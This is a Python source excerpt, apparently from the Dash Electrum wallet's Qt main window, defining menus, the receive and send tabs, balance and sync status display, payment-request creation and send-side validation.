labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
invoices_menu.addAction(_("Export With Extensions"),
lambda: self.export_invoices_with_ext())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.dip3_tab)
add_toggle_action(view_menu, self.console_tab)
wallet_menu.addSeparator()
wallet_menu.addAction(_('PrivateSend'),
lambda: show_ps_dialog_or_wizard(self))
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Dash Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction('Help Ukraine', self.ukraine_info)
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.dash.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("https://docs.dash.org/en/stable/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents)
self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=True))
self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
help_menu.addAction(self._auto_crash_reports)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key(BaseCrashReporter.config_key, state, True)
for w in self.gui_object.windows:
w._auto_crash_reports.setChecked(state)
Exception_Hook.show_need_restart_msg(self)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('dash:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Dash Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Dash.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Dash system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
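# The whitepaper PDF is embedded across this transaction's outputs; the slicing below strips the script framing bytes to reassemble the raw file.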
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Dash Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Dash Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Dash Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Dash Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
self.console_tab.lock_if_need()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
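# The 'follows' flag prevents feedback loops when one amount field programmatically updates the other.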
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
not_connected_msg = _('Electrum network not connected')
if self.network.proxy:
text = "{} ({})".format(not_connected_msg, _("proxy enabled"))
else:
text = not_connected_msg
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.update_available_amount()
self.update_receive_address_styling()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The Dash address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a Dash address any number of times but it is not good for your privacy.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("dashcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice())
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
grid.addLayout(buttons, 4, 0, 1, -1)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.setObjectName("receive_container")
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.get_address()
title = _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
recv_addr_e = self.receive_address_e
if is_address(addr) and self.wallet.is_used(addr):
recv_addr_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
recv_addr_e.setToolTip(_('This address has already been used.'
' For better privacy, do not reuse it'
' for new payments.'))
elif addr in self.wallet.db.get_ps_reserved():
recv_addr_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
recv_addr_e.setToolTip(_('This address has been reserved for'
' PrivateSend use. For better privacy,'
' do not use it for new payments.'))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(Qt.CaseInsensitive)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
# PrivateSend options
msg = (_('Send transaction using PrivateSend anonymized coins') +
'\n\n' +
_('Amount available for current send options'))
send_options_label = HelpLabel(_('Send options') + ', ' +
_('Available amount'), msg)
send_options_label.setWordWrap(True)
send_options_label.setVisible(True)
grid.addWidget(send_options_label, 3, 0)
self.ps_cb = QCheckBox(_('PrivateSend'))
self.ps_cb.stateChanged.connect(self.on_ps_cb)
self.ps_cb.setVisible(True)
grid.addWidget(self.ps_cb, 3, 1)
self.av_amnt = BTCAmountEdit(self.get_decimal_point)
self.av_amnt.setEnabled(False)
self.av_amnt.setVisible(True)
grid.addWidget(self.av_amnt, 3, 3)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 7, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
self.extra_payload = ExtraPayloadWidget(self)
self.extra_payload.hide()
msg = _('Extra payload.') + '\n\n'\
+ _('Dash DIP2 Special Transaction extra payload.')
self.extra_payload_label = HelpLabel(_('Extra payload'), msg)
self.extra_payload_label.hide()
grid.addWidget(self.extra_payload_label, 9, 0)
grid.addWidget(self.extra_payload, 9, 1, 1, -1)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
w.setObjectName("send_container")
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
psman = self.wallet.psman
is_ps = self.ps_cb.isChecked()
min_rounds = None if not is_ps else psman.mix_rounds
no_ps_data = psman.is_hw_ks and not psman.enabled
tx_type, extra_payload = self.extra_payload.get_extra_data()
def make_tx(fee_est):
tx = self.wallet.make_unsigned_transaction(
coins=self.get_coins(min_rounds=min_rounds),
outputs=outputs,
fee=fee_est,
is_sweep=False,
min_rounds=min_rounds, no_ps_data=no_ps_data,
tx_type=tx_type, extra_payload=extra_payload)
if tx.tx_type:
tx.extra_payload.check_after_tx_prepared(tx)
return tx
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except (MultipleSpendMaxTxOutputs, DashTxError) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
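# @protected (defined elsewhere in this module) obtains the wallet password when needed and supplies it to the wrapped call.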
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Dash Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
